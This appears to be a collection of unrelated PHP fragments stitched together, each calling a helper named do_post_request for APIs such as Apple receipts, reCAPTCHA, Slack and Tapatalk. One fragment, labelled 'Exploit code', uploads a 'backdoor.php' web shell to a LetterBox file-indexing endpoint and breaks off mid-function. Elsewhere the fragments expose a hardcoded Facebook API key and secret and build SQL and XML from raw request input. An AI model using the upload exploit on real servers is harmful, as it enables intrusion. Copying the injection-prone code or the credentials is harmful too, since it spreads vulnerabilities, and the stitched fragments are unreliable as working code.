public function generateToken($pid, $username, $terminalType) { $APIversion = "0.1"; $authType_Token = 0; $appAccountID_Token = $pid . "-" . $username; $userTerminalType_Token = $terminalType; $userTerminalSN_Token = time(); $grantedCapabilityID_Token = "100<200<301<302<303<400"; $callbackURL_Token = ""; $url_Token = "http://" . $this->restServer . "/RTC/ws/" . $APIversion . "/ApplicationID/" . $this->appid . "/CapabilityToken"; $headers = "Content-Type: application/json\r\n"; $headers .= "authorization: RTCAUTH,realm=AppServer,ApplicationId=" . $this->appid . ",APP_Key=" . $this->appkey; $postData_Token_arr['authType'] = $authType_Token; $postData_Token_arr['appAccountID'] = $appAccountID_Token; $postData_Token_arr['userTerminalType'] = $userTerminalType_Token; $postData_Token_arr['userTerminalSN'] = $userTerminalSN_Token; $postData_Token_arr['grantedCapabiltyID'] = $grantedCapabilityID_Token; $postData_Token_arr['callbackURL'] = $callbackURL_Token; $postData_Token_json = json_encode($postData_Token_arr); $header_Servers = array('http' => array('header' => $headers, 'timeout' => 6)); $result_Token = do_post_request($url_Token, $postData_Token_json, $headers); $token_obj = json_decode($result_Token); $web_sip_password = $token_obj->capabilityToken; $token_back = $web_sip_password . "|" . $username . "|" . $pid . "|" . $this->appid . "|" . $userTerminalSN_Token . "|" . $userTerminalType_Token; //echo $token_back; $base64_token_back = base64_encode($token_back); return $base64_token_back; }
function UpdateGoogleKey($server, $username, $password, $database) { global $gLoginKeyAttempts; global $gServerKey; try { $email = "<YOUR_EMAIL>"; $password = "******"; if ($gLoginKeyAttempts <= 3) { $gServerKey = do_post_request("", "accountType=HOSTED_OR_GOOGLE&Email={$email}&Passwd={$password}&service=ac2dm&source=teleknEsis-C2DMSample-1.0"); if ($gServerKey && strlen($gServerKey) > 0) { $startIndex = strpos($gServerKey, "Auth="); $gServerKey = substr($gServerKey, $startIndex + 5); // Now I save the server key to a MySQL db $mysqli = new mysqli($server, $username, $password, $database); $result = $mysqli->query("CALL UpdateGoogleLoginKey( '{$gServerKey}' )"); } else { // retry $gLoginKeyAttempts += 1; UpdateGoogleKey($server, $username, $password, $database); } } else { echo "ERROR UPDATING GOOGLE LOGIN KEY"; } } catch (Exception $error) { echo "UpdateGoogleKey: " . $error->getMessage() . "\n"; } }
/** * Sends an API request to Facebook * * @param array $parameters Array of parameters to send * @param string $method The API function to call * @return array Returns array of data returned */ function do_facebook_request($parameters, $method) { if (empty($parameters) || empty($method)) { return false; } // Build Facebook args // $data['api_key'] = 'API KEY'; $data['method'] = $method; $data['v'] = '1.0'; // Loop through and set as array foreach ($parameters as $key => $value) { $data[$key] = $value; } // Sort ksort($data); $args = ''; foreach ($data as $key => $value) { $args .= $key . '=' . $value; } $data['sig'] = md5($args . 'secret'); // Get a Facebook session $response = do_post_request('', $data); // Handle XML [23] $xml = simplexml_load_string($response); return $xml; }
/** * Sends an API request to Facebook * * @param array $parameters Array of parameters to send * @param string $method The API function to call * @return array Returns array of data returned */ function do_facebook_request($parameters, $method) { if (empty($parameters) || empty($method)) { return false; } // Build Facebook args // $data['api_key'] = 'a4fe481e90134c25d517872e0a67e3ce'; $data['method'] = $method; $data['v'] = '1.0'; // Loop through and set as array foreach ($parameters as $key => $value) { $data[$key] = $value; } // Sort ksort($data); $args = ''; foreach ($data as $key => $value) { $args .= $key . '=' . $value; } $data['sig'] = md5($args . 'e7452cf6aa4b5b039a25cd7b037676e9'); // Get a Facebook session $response = do_post_request('', $data); //echo $response; // Handle XML $xml = simplexml_load_string($response); print_r($xml); //return $xml; }
function translate($item, $from, $to) { $url = str_replace(" ", "%20", "" . $item . "&langpair=" . $from . "%7C" . $to); $result = do_post_request($url); // now, process the JSON string return json_decode($result)->{'responseData'}->{'translatedText'}; // now have some fun with the results... }
function buildImage($ditaa) { $args = array(); $args['ditaa'] = $ditaa; $args['no-antialias'] = $this->antialias ? 0 : 1; $args['no-shadows'] = $this->shadows ? 0 : 1; $args['scale'] = $this->scale; $args['round-corners'] = $this->round_corners ? 1 : 0; $args['no-separations'] = $this->separations ? 0 : 1; return do_post_request($this->url, $args); }
function validateReceipt($receiptdata, $devmode = FALSE) { if ($devmode) { $appleURL = ""; } else { $appleURL = ""; } $receipt = json_encode(array("receipt-data" => $receiptdata)); $response_json = do_post_request($appleURL, $receipt); $response = json_decode($response_json); return $response; }
function validateReceiptAbonnement($hex, $testing = 1) { $password = "******"; if ($testing == 1) { $url = ''; } else { $url = ''; } $postData = json_encode(array('receipt-data' => $hex, 'password' => $password)); $response_json = do_post_request($url, $postData); $response = json_decode($response_json); return $response; }
function check() { global $error; global $CONST; if (isset($_POST["usernamesignup"]) && isset($_POST["anweshasignup"]) && isset($_POST["passwordsignup"]) && isset($_POST['6_letters_code'])) { } else { $error["msg"] = 'Incomplete request'; $error['component'] = 'username'; return; } $user = $_POST["usernamesignup"]; $anw = $_POST["anweshasignup"]; $pass = $_POST["passwordsignup"]; /** * validating captcha */ if (empty($_SESSION['6_letters_code']) || $_SESSION['6_letters_code'] != $_POST['6_letters_code']) { $error["msg"] = "The captcha code does not match!"; $error["component"] = "captcha"; return; } /** * getting the status of login in anwesha website */ $url = ''; $data = array('username' => $anw, 'password' => $pass); $data = http_build_query($data); $reply = do_post_request($url, $data); $res = (array) json_decode($reply); /** * getting the login status */ if (!$res['status']) { $error["msg"] = "Authentication failed. You entered an incorrect Anwesha ID or password."; $error["component"] = "anwesha"; return; } $hash = sha1($pass); if (!checkUsername($user)) { $error["msg"] = "Username already taken."; $error["component"] = "username"; return; } if (!filter_var($user, FILTER_VALIDATE_REGEXP, array("options" => array('regexp' => '/^[\\w]{5,15}$/')))) { $error["msg"] = "Inappropriate username (5 to 15 alphanumeric characters needed)"; $error["component"] = "username"; return; } // var_dump($CONT); }
function ticket_post($name, $email, $topicId, $subject, $message, $ticket_type_id = '') { global $ticket_post_url; $pri = "2"; $dept_id = "1"; $fields = array('name' => urlencode($name), 'email' => urlencode($email), 'topicId' => urlencode($topicId), 'subject' => urlencode($subject), 'tickettype' => urlencode($ticket_type_id), 'dept_id' => urlencode($dept_id), 'pri' => urlencode($pri), 'message' => urlencode($message)); $fields_string = ''; $response = ''; foreach ($fields as $key => $value) { $fields_string .= $key . '=' . $value . '&'; } rtrim($fields_string, '&'); try { $response = do_post_request($ticket_post_url, $fields_string); } catch (Exception $e) { } return $response; }
function getsListPhone() { $ip = ""; $Signature = md5(API_TOKEN); $url = $this->api_url . "/api/getsListPhone"; $data = array('API_TOKEN' => API_TOKEN, 'Signature' => $Signature, 'Ip' => $ip); $response = do_post_request($url, $data); switch ($response) { case '-110': $result['code'] = $response; $result['msg'] = 'Mã bảo mật không chính xác'; case '-111': $result['code'] = $response; $result['msg'] = 'Chữ ký điện tử không hợp lệ'; default: $result['code'] = $response; $result['msg'] = ''; } return $result; }
function immediate_update_outcome_in_canvas($oauth_consumer_key, $secret, $lti_sourced_id, $lis_outcome_service_url, $score) { set_time_limit(180); $xmlRequest = "<?xml version = \"1.0\" encoding = \"UTF-8\"?>\n<imsx_POXEnvelopeRequest xmlns=\"\">\n <imsx_POXHeader>\n <imsx_POXRequestHeaderInfo>\n <imsx_version>V1.0</imsx_version>\n <imsx_messageIdentifier>999999123</imsx_messageIdentifier>\n </imsx_POXRequestHeaderInfo>\n </imsx_POXHeader>\n <imsx_POXBody>\n <replaceResultRequest>\n <resultRecord>\n <sourcedGUID>\n <sourcedId>{$lti_sourced_id}</sourcedId>\n </sourcedGUID>\n <result>\n <resultScore>\n <language>en</language>\n <textString>" . $score . "</textString>\n </resultScore>\n </result>\n </resultRecord>\n </replaceResultRequest>\n </imsx_POXBody>\n</imsx_POXEnvelopeRequest>"; $hash = base64_encode(sha1($xmlRequest, TRUE)); $params = array('oauth_body_hash' => $hash); $hmac_method = new OAuthSignatureMethod_HMAC_SHA1(); $consumer = new OAuthConsumer($oauth_consumer_key, $secret, NULL); $req = OAuthRequest::from_consumer_and_token($consumer, NULL, 'POST', $lis_outcome_service_url, $params); $req->sign_request($hmac_method, $consumer, NULL); $params = $req->get_parameters(); $header = $req->to_header(); $header .= "\nContent-type: application/xml"; $ext_response = do_post_request($lis_outcome_service_url, $xmlRequest, $header); $ext_doc = new DOMDocument(); set_error_handler(array($this, 'HandleXmlError')); $ext_doc->loadXML($ext_response); restore_error_handler(); $ext_nodes = domnode_to_array($ext_doc->documentElement); if (!isset($ext_nodes['imsx_POXHeader']['imsx_POXResponseHeaderInfo']['imsx_statusInfo']['imsx_codeMajor'])) { throw new Exception("No imsx_codeMajor from outcome service for " . $lti_sourced_id); } if ($ext_nodes['imsx_POXHeader']['imsx_POXResponseHeaderInfo']['imsx_statusInfo']['imsx_codeMajor'] != 'success' && isset($ext_nodes['imsx_POXHeader']['imsx_POXResponseHeaderInfo']['imsx_statusInfo']['imsx_description']) && $ext_nodes['imsx_POXHeader']['imsx_POXResponseHeaderInfo']['imsx_statusInfo']['imsx_description'] != 'User is no longer in course') { throw new Exception("No success code from outcome service for " . $lti_sourced_id); } }
function tsv_sms_enviar($telefono, $mensaje, $firma) { $datos = array('telefono' => $telefono, 'mensaje' => $mensaje, 'firma' => $firma, 'enviar' => '¡Enviar Mensaje!'); return do_post_request('', http_build_query($datos)); }
define('IN_MOBIQUO', 1); if (isset($_GET['allowAccess'])) { echo "yes"; exit; } if (isset($_GET['checkip'])) { print do_post_request(array('ip' => 1), true); } else { $output = 'Tapatalk Push Notification Status Monitor<br><br>'; $output .= 'Push notification test: <b>'; require_once dirname(dirname(__FILE__)) . '/SSI.php'; global $modSettings, $smcFunc; if (isset($modSettings['tp_push_key']) && !empty($modSettings['tp_push_key'])) { $push_key = $modSettings['tp_push_key']; $return_status = do_post_request(array('test' => 1, 'key' => $push_key), true); if ($return_status === '1') { $output .= 'Success</b>'; } else { $output .= 'Failed</b><br />' . $return_status; } } else { $output .= 'Failed</b><br />Please set Tapatalk API Key at forum option/setting<br />'; } //$ip = do_post_request(array('ip' => 1), true); $forum_url = get_forum_path(); $table_exist = mobi_table_exist('tapatalk_users') ? 'Yes' : 'No'; $output .= "<br>Current forum url: " . $forum_url . "<br>"; //$output .="Current server IP: ".$ip."<br>"; $output .= "Tapatalk user table existence:" . $table_exist . "<br>"; if (isset($modSettings['push_slug'])) {
Exploit code : <?php /* EXPLOIT URL */ $target_url = ""; /* EMPTY FOR OLDS VERSIONS LIKE LETTERBOX 2.3 */ $indexing_path = "indexing_searching/"; /* TARGET UPLOAD FILE */ $target_file = "file_to_index.php"; /* FILE TO UPLOAD IN SAME PATH AS THIS SCRIPT */ $file = "backdoor.php"; /* NAME, EMPTY WITH LETTERBOX */ $name = "shell"; /* LAUNCHING EXPLOIT */ do_post_request($target_url . $indexing_path . $target_file . "?md5=" . $name, $target_url, $file, $name); function do_post_request($url, $res, $file, $name) { $data = ""; $boundary = "---------------------" . substr(md5(rand(0, 32000)), 0, 10); $data .= "--{$boundary}\n"; $fileContents = file_get_contents($file); $md5 = md5_file($file); $ext = pathinfo($file, PATHINFO_EXTENSION); $data .= "Content-Disposition: form-data; name=\"file\"; filename=\"file.php\"\n"; $data .= "Content-Type: text/plain\n"; $data .= "Content-Transfer-Encoding: binary\n\n"; $data .= $fileContents . "\n"; $data .= "--{$boundary}--\n"; $params = array('http' => array('method' => 'POST', 'header' => 'Content-Type: multipart/form-data; boundary=' . $boundary, 'content' => $data)); $ctx = stream_context_create($params);
function getUserCardLog($username) { // define value $wsUserName = $this->wsUsername; $wsPassword = $this->wsPassword; $ip = ""; $Signature = md5($username . $wsUserName . $wsPassword); $url = $this->base_url . "api/api/getUserCardLog"; $data = array('UserName' => $username, 'wsUserName' => $wsUserName, 'wsPassword' => $wsPassword, 'Signature' => $Signature, 'Ip' => $ip); $checkLoginResult = do_post_request($url, $data); // ignore ssl switch ($checkLoginResult) { case '-888': $result['code'] = $checkLoginResult; $result['msg'] = "Tài khoản hoặc mật khẩu không đúng."; //'Lỗi hệ thống.'; break; case '-110': $result['code'] = $checkLoginResult; $result['msg'] = 'Tham số của hàm không hợp lệ.'; break; case '-102': $result['code'] = $checkLoginResult; $result['msg'] = 'Chữ ký điện tử không hợp lệ.'; break; case '-101': $result['code'] = $checkLoginResult; $result['msg'] = 'Ip bị cấm truy cập WebService.'; break; case '-100': $result['code'] = $checkLoginResult; $result['msg'] = 'Tài khoản WebService không tồn tại.'; break; case '-1': $result['code'] = $checkLoginResult; $result['msg'] = 'Tài khoản hoặc mật khẩu không đúng.'; break; default: $result['code'] = 1; $result['msg'] = $checkLoginResult; } //print_r($result);exit; return $result; }
$destinationCode = @strtoupper($_GET["destinationCode"]); $gatewayCode = @strtoupper($_GET["gatewayCode"]); $roomId = @$_GET["roomId"]; $firstname = @$_GET["firstname"]; $lastname = @$_GET["lastname"]; $txtLeave = @$_GET["txtLeave"]; $txtReturn = @$_GET["txtReturn"]; //Non essential for booking but needed for posting to DB and sending confirmation email $email = @$_GET["email"]; $phone = @$_GET["phone"]; $roomDesc = @$_GET["roomDesc"]; $hotelName = @$_GET["hotelName"]; $quotedPrice = @$_GET["price"]; $commentBox = @$_GET["commentBox"]; $bookingXml = "XMLfile=<BookTripRequest>\n <SessionID>TestingForm</SessionID>\n <TourOperatorCode>TIM</TourOperatorCode>\n <AgencyCode>21754246</AgencyCode>\n <ClientType></ClientType>\n <ReturnItemList>Y</ReturnItemList>\n <WantInsurance>N</WantInsurance>\n <RoomPaxLists>\n <TotalPassengerCount>2</TotalPassengerCount>\n <PassengerList>\n <PassengerCount>2</PassengerCount>\n <Passenger>\n <PassengerFirstName>{$firstname}</PassengerFirstName>\n <PassengerLastName>{$lastname}</PassengerLastName>\n </Passenger>\n <Passenger>\n <PassengerFirstName>Placeholder</PassengerFirstName>\n <PassengerLastName>{$lastname}</PassengerLastName>\n </Passenger>\n <ChildList>\n <ChildCount>0</ChildCount>\n </ChildList>\n </PassengerList>\n </RoomPaxLists>\n \n <GatewayCode>{$gatewayCode}</GatewayCode>\n <DestinationCode>{$destinationCode}</DestinationCode>\n <DepartureDate>{$txtLeave}</DepartureDate>\n <ReturnDate>{$txtReturn}</ReturnDate>\n \n <HotelRequest>\n <RoomID>{$roomId}</RoomID>\n <NumberOfRooms>1</NumberOfRooms>\n </HotelRequest>\n \n</BookTripRequest>"; $xmlResponse = do_post_request(BOOKING_URL, $bookingXml); if (!empty($xmlResponse)) { if (@(!($sxe = simplexml_load_string($xmlResponse)))) { error_log("Error while parsing search xml for gatewayCode {$gatewayCode} and destinationCode {$destinationCode}", 0); } if (!($dom = dom_import_simplexml($sxe))) { error_log("Error while parsing search xml, second level, for gatewayCode {$gatewayCode} and destinationCode {$destinationCode}", 0); } $exceptionResponse = $dom->getElementsByTagName('ExceptionText'); if ($exceptionResponse->length > 0) { error_log("Error while booking gatewayCode {$gatewayCode} and destinationCode {$destinationCode}, leaving {$txtLeave} and returning {$txtReturn}", 0); } else { $bookingNumber = $dom->getElementsByTagName('BookingNo')->item(0)->nodeValue; if (!empty($email)) { sendConfirmationEmail($bookingNumber, $email, $hotelName, $roomDesc, $txtLeave, $txtReturn, $quotedPrice, $firstname . " " . $lastname, $phone, $commentBox); }
<?php error_log("someone posted to the test_comment.php file"); //error_log("post body was"); //error_log(print_r($HTTP_RAW_POST_DATA,TRUE)); function do_post_request($url, $xml_req, $optional_headers = null) { $ses = curl_init(""); if ($ses === FALSE) { error_log("error connecting"); error_log(print_r(curl_getinfo($ses), TRUE)); return ""; } curl_setopt($ses, CURLOPT_POST, TRUE); $headers = array('Content-type:text/xml', 'Content-Length:' . strlen($xml_req), 'Expect:'); curl_setopt($ses, CURLOPT_HTTPHEADER, $headers); curl_setopt($ses, CURLOPT_POSTFIELDS, $xml_req); curl_setopt($ses, CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($ses, CURLOPT_FAILONERROR, TRUE); $ret = curl_exec($ses); if ($ret === FALSE) { error_log(curl_error($ses)); return ""; } error_log("got response " . $ret); return $ret; } $url = ""; $xml_req = $HTTP_RAW_POST_DATA; echo do_post_request($url, $xml_req);
exit; } if (isset($_GET['checkip'])) { print do_post_request(array('ip' => 1), true); } else { // print_r($GLOBALS); $output = 'Tapatalk Push Notification Status Monitor<br><br>'; $output .= 'Push notification test: <b>'; require_once dirname(dirname(__FILE__)) . '/SSI.php'; $return_status = do_post_request(array('test' => 1, 'url' => $boardurl), true); if ($return_status === '1') { $output .= 'Success</b>'; } else { $output .= 'Failed</b><br />' . $return_status; } $ip = do_post_request(array('ip' => 1), true); $table_exist = mobi_table_exist('tapatalk_users') ? 'Yes' : 'No'; $output .= "<br>Current forum url: " . $boardurl . "<br>"; $output .= "Current server IP: " . $ip . "<br>"; $output .= "Tapatalk user table existence:" . $table_exist . "<br>"; if (isset($modSettings['push_slug'])) { $push_slug = unserialize(base64_decode($modSettings['push_slug'])); if (!empty($push_slug) && is_array($push_slug)) { $output .= 'Push Slug Status : ' . ($push_slug['stick'] == 1 ? 'Stick' : 'Free') . '<br />'; } if (isset($_GET['slug'])) { $output .= 'Push Slug Value: ' . $modSettings['push_slug'] . "<br /><br />"; } } $output .= "<br>\n<a href=\"\" target=\"_blank\">Tapatalk API for Universal Forum Access</a><br>\nFor more details, please visit <a href=\"\" target=\"_blank\"></a>"; echo $output;
if ($do == 2) { $ip = (isset($_POST['ip_address']) and !empty($_POST['ip_address'])) ? $_POST['ip_address'] : ((isset($_GET['ip_address']) and !empty($_GET['ip_address'])) ? $_GET['ip_address'] : i2c_realip()); $post_data = array(); $post_data['ip_address'] = $ip; if (function_exists('curl_init') and $ch = curl_init()) { curl_setopt($ch, CURLOPT_URL, ''); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); if (curl_errno($ch)) { exit(curl_error($ch)); } curl_close($ch); } else { $postResult = do_post_request('', 'ip_address=' . $ip); } begin_frame('Search Result'); if (empty($errormessage)) { $regex = '' . '#<b>' . $ip . '</b>(.*).<br><br><img src=(.*)>#U'; preg_match_all($regex, $postResult, $result, PREG_SET_ORDER); echo '<tr><td align=center>IP Address <b>' . htmlspecialchars($ip) . '</b>' . $result[0][1] . '.<br><br><img src="' . $result[0][2] . '"></td></tr>'; } else { echo '<tr><td>' . $errormessage . '</td></tr>'; } end_frame(); echo '<br>'; } begin_frame('Ip to Country'); echo ' <tr><td align=center>
<?php include "../../settings/config.php"; include "../../settings/databaseinfo.php"; include "../../settings/json.php"; include "../../settings/mysql.php"; include "../../languages/translator.php"; include "../../templates/templates.php"; $DbLink = new DB(); if ($_GET[name]) { $userName = $_GET['name']; $found = array(); $found[0] = json_encode(array('Method' => 'GetProfile', 'WebPassword' => md5(WEBUI_PASSWORD), 'Name' => cleanQuery($_GET['name']))); $do_post_requested = do_post_request($found); $recieved = json_decode($do_post_requested); $profileTXT = $recieved->{'profile'}->{'AboutText'}; $profileImage = $recieved->{'profile'}->{'Image'}; $created = $recieved->{'account'}->{'Created'}; $UUID = $recieved->{'account'}->{'PrincipalID'}; $diff = $recieved->{'account'}->{'TimeSinceCreated'}; $type = $recieved->{'account'}->{'AccountInfo'}; $partner = $recieved->{'account'}->{'Partner'}; $date = date("D d M Y - g:i A", $created); } $DbLink->query("SELECT id,\n displayTopPanelSlider, \n displayTemplateSelector,\n displayStyleSwitcher,\n displayStyleSizer,\n displayFontSizer,\n displayLanguageSelector,\n displayScrollingText,\n displayWelcomeMessage,\n displayLogo,\n displayLogoEffect,\n displaySlideShow,\n displayMegaMenu,\n displayDate,\n displayTime,\n displayRoundedCorner,\n displayBackgroundColorAnimation,\n displayPageLoadTime,\n displayW3c,\n displayRss FROM " . C_ADMINMODULES_TBL . " "); list($id, $displayTopPanelSlider, $displayTemplateSelector, $displayStyleSwitcher, $displayStyleSizer, $displayFontSizer, $displayLanguageSelector, $displayScrollingText, $displayWelcomeMessage, $displayLogo, $displayLogoEffect, $displaySlideShow, $displayMegaMenu, $displayDate, $displayTime, $displayRoundedCorner, $displayBackgroundColorAnimation, $displayPageLoadTime, $displayW3c, $displayRss) = $DbLink->next_record(); ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" ""> <html xmlns=""> <head>
$createform .= "<div class='alert alert-warning text-center'>Warning: This form is insecure.</div>"; } if ($_REQUEST['s'] == 'next') { $email_preg = "/[a-z0-9!#\$%&'*+=?^_`{|}~-]+(?:\\.[a-z0-9!#\$%&'*+=?^_`{|}~-]+)*@(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\\.)+(?:[a-z]{2}|com|org|net|edu|gov|mil|biz|info|mobi|name|aero|asia|jobs|museum)\\b/"; if (!empty($_POST['honey'])) { $login_ouptut .= "<div class='alert alert-warning'><button type='button' class='close' data-dismiss='alert' aria-label='Close'><span aria-hidden='true'>×</span></button><p><strong>Whoops!</strong> You tripped one of our bot tests. If you are not a bot, please go back and try again. Read your fields carefully!</p></div>"; $_POST['email'] = 'bob'; } # $recaptcha_uri = ""; $recaptcha_params = array("secret" => $recaptcha_private_key, "response" => $_POST["g-recaptcha-response"], "remoteip" => $_SERVER["REMOTE_ADDR"]); try { if ($debug) { $login_output .= "<pre>Querying reCAPTCHA: " . displayDebug($recaptcha_params) . "\n to {$recaptcha_uri}</pre>"; } $bareResponse = do_post_request($recaptcha_uri, $recaptcha_params); if ($debug) { $login_output .= "<pre>Bare output: " . displayDebug($bareResponse) . "</pre>"; } $resp = json_decode($bareResponse, true); if (empty($bareResponse) || $bareResponse === false) { throw new Exception("Bad Response"); } if ($debug) { $login_output .= "<pre>Parsed output: " . displayDebug($resp) . "</pre>"; } } catch (Exception $e) { $resp["success"] = false; $resp["post-error"] = $e->getMessage(); $resp["full_error"] = $e; $resp["login_caught_error"] = true;
//echo "beg loop<br/>"; die(); //echo date('c').' - '.$i.' - '."\"".$user['name']."\" <".$user['email']."> - Inviting to ".$slackHostName." Slack\n\n"; //echo "user array:"; //printArray($user); $fields = array('email' => $user['email'], 'first_name' => urlencode($user['first_name']), 'last_name' => urlencode($user['last_name']), 'channels' => urlencode($slackAutoJoinChannels), 'token' => urlencode($slackAuthToken), 'set_active' => urlencode('true'), '_attempts' => '1'); //echo "fields array:"; //printArray($fields); // url-ify the data for the POST $fields_string = ''; foreach ($fields as $key => $value) { $fields_string .= $key . '=' . $value . '&'; } rtrim($fields_string, '&'); $slackInviteUrl .= $fields_string; //echo $slackInviteUrl; $replyRaw = do_post_request($slackInviteUrl, null, null); $reply = json_decode($replyRaw, true); if ($reply['ok'] == false) { $error .= " Slack error: " . $reply['error'] . " "; header("Location: slack.php?success=0&erros={$error}"); //echo date('c') . " - " . $user['first_name'] . " " . $user['last_name'] . " - " . $user['email'] . " - " . "Error: " . $reply['error'] . "<br/>"; } else { //echo date('c') . " - " . $user['first_name'] . " " . $user['last_name'] . " - " . $user['email'] . " - " . "Invited successfully" . "<br/>"; } array_push($previouslyInvitedEmails, $user); //echo "end loop<br/>"; } else { //echo "already in array<br/>"; $error .= " Email was already used to sign up (check your email for an invitation from Slack). "; //echo $error; die(); header("Location: slack.php?success=0&error={$error}");
} } else { if (isset($_COOKIE['SESSIONID'])) { echo do_get_request(rtrim($server, "/") . $resource, "Cookie: SESSIONID=" . $_COOKIE['SESSIONID']); } else { echo do_get_request(rtrim($server, "/") . $resource); } } } else { $parts = explode("?", $_SERVER['REQUEST_URI']); if (count($parts) > 1) { $parts = explode("&", base64_decode($parts[1])); if (count($parts) == 2) { // in case we're continuing stage negotiation $uri = $server . $parts[1] . "?" . base64_encode($parts[0]); $postdata = file_get_contents("php://input"); if (isset($_COOKIE['SESSIONID'])) { echo do_post_request($uri, $postdata, "Cookie: SESSIONID=" . $_COOKIE['SESSIONID']); } else { echo do_post_request($uri, $postdata); } } } else { $postdata = file_get_contents("php://input"); if (isset($_COOKIE['SESSIONID'])) { echo do_post_request(rtrim($server, "/") . $resource, $postdata, "Cookie: SESSIONID=" . $_COOKIE['SESSIONID']); } else { echo do_post_request(rtrim($server, "/") . $resource, $postdata); } } }
} $data .= "--" . $boundary . "\n"; if (is_array($files)) { foreach ($files as $key => $file) { $fileContents = file_get_contents($file['tmp_name']); $data .= "Content-Disposition: form-data; name=" . $key . "; filename=" . $file['name'] . "\n"; $data .= "Content-Type: application/x-bittorrent\n"; $data .= "Content-Transfer-Encoding: binary\n\n"; $data .= $fileContents . "\n"; $data .= "--" . $boundary . "--\n"; } } $params = array('http' => array('method' => 'POST', 'header' => 'Content-Type: multipart/form-data; boundary=' . $boundary, 'content' => $data)); $ctx = stream_context_create($params); $fp = @fopen($url, 'rb', false, $ctx); if (!$fp) { throw new Exception("Problem with " . $url . ", " . $php_errormsg); } $response = @stream_get_contents($fp); if ($response === false) { throw new Exception("Problem reading data from " . $url . ", " . $php_errormsg); } return $response; } if (count($_POST)) { $post = $_POST; } $post['submit'] = "Upload"; $files['torrent_file'] = $_FILES['torrent_file']; print_r(do_post_request($api, $post, $files));
} return $ids; } if (ZM_OPT_USE_AUTH && ZM_AUTH_HASH_LOGINS && empty($user) && !empty($_REQUEST['auth'])) { if ($authUser = getAuthUser($_REQUEST['auth'])) { userLogin($authUser['Username'], $authUser['Password'], true); } } if (!empty($action)) { if ($action == "login" && isset($_REQUEST['username']) && (ZM_AUTH_TYPE == "remote" || isset($_REQUEST['password']))) { // if true, a popup will display after login // PP - lets validate reCaptcha if it exists if (defined('ZM_OPT_USE_GOOG_RECAPTCHA') && defined('ZM_OPT_GOOG_RECAPTCHA_SECRETKEY') && defined('ZM_OPT_GOOG_RECAPTCHA_SITEKEY') && ZM_OPT_USE_GOOG_RECAPTCHA && ZM_OPT_GOOG_RECAPTCHA_SECRETKEY && ZM_OPT_GOOG_RECAPTCHA_SITEKEY) { $url = ''; $fields = array('secret' => ZM_OPT_GOOG_RECAPTCHA_SECRETKEY, 'response' => $_REQUEST['g-recaptcha-response'], 'remoteip' => $_SERVER['REMOTE_ADDR']); $res = do_post_request($url, http_build_query($fields)); $responseData = json_decode($res, true); // PP - credit: // if recaptcha resulted in error, we might have to deny login if (isset($responseData['success']) && $responseData['success'] == false) { // PP - before we deny auth, let's make sure the error was not 'invalid secret' // because that means the user did not configure the secret key correctly // in this case, we prefer to let him login in and display a message to correct // the key. Unfortunately, there is no way to check for invalid site key in code // as it produces the same error as when you don't answer a recaptcha if (isset($responseData['error-codes']) && is_array($responseData['error-codes'])) { if (!in_array('invalid-input-secret', $responseData['error-codes'])) { Error("reCaptcha authentication failed"); userLogout(); $view = 'login'; $refreshParent = true;
<?php if (!empty($_POST)) { $url = "http://localhost/url/shorten.php"; $xmlcontent = "<?xml version='1.0'?><data><user><username>" . $_POST['username'] . "</username><password>" . $_POST['password'] . "</password></user><url><long>" . $_POST['url'] . "</long></url></data>"; $data = do_post_request($url, $xmlcontent); print_r($data); if ($data->status == 1) { echo "<h1>Your short url: <a href='http://localhost/url/" . $data->url->short . "'>http://localhost/url/" . $data->url->short . "</a></h1>"; } else { echo "<h1>Error: " . $data->error . "</h1>"; } } function do_post_request($url, $data, $optional_headers = null) { $params = array('http' => array('method' => 'POST', 'content' => $data)); if ($optional_headers !== null) { $params['http']['header'] = $optional_headers; } $ctx = stream_context_create($params); $fp = @fopen($url, 'rb', false, $ctx); if (!$fp) { throw new Exception("Problem with {$url}, {$php_errormsg}"); } $response = @stream_get_contents($fp); if ($response === false) { throw new Exception("Problem reading data from {$url}, {$php_errormsg}"); } return simplexml_load_string($response); }
/** * stathat_ez_value_sync function. * * @access public * @param mixed $email * @param mixed $stat_name * @param mixed $value * @return void */ function stathat_ez_value_sync($email, $stat_name, $value) { return do_post_request("", "email={$email}&stat={$stat_name}&value={$value}"); }
} else { exit; } } } if (!isset($_REQUEST['setting'])) { exit; } $url = 'http://localhost:8080/imsblis/service/'; $url = $_REQUEST['url']; $data = array('lti_message_type' => $message, 'id' => $_REQUEST['id'], 'setting' => $_REQUEST['setting']); $oauth_consumer_key = $_REQUEST['key']; $newdata = signParameters($data, $url, 'POST', $oauth_consumer_key, $oauth_consumer_secret); echo "<pre>\n"; echo "Posting to URL {$url} \n"; ksort($newdata); foreach ($newdata as $key => $value) { if (get_magic_quotes_gpc()) { $value = stripslashes($value); } print "{$key}={$value} (" . mb_detect_encoding($value) . ")\n"; } global $last_base_string; echo "\nBase String:\n</pre><p>\n"; echo $last_base_string; echo "\n</p>\n<pre>\n"; $retval = do_post_request($url, http_build_query($newdata)); $retval = str_replace("<", "<", $retval); $retval = str_replace(">", ">", $retval); echo "Response from server\n"; echo $retval;
function announce_songs($songlist_struct) { global $REL_PATH; $ts = time(); $prefs_struct = get_opentape_prefs(); $json = new Services_JSON(SERVICES_JSON_LOOSE_TYPE); $version_struct = $json->encode($songlist_struct[get_tape_path()]); $data = http_build_query(array('version' => constant("VERSION"), 'url' => get_base_url(), 'songs' => $version_struct)); $result = do_post_request(constant("ANNOUNCE_SONGS_URL"), $data, null); if (!strcmp($result, "OK")) { } else { error_log("Failed to announce songs to " . constant("ANNOUNCE_SONGS_URL") . " result was: " . $result); } $prefs_struct['last_announce_songs'] = $ts; if (write_opentape_prefs($prefs_struct)) { return $prefs_struct; } else { false; } }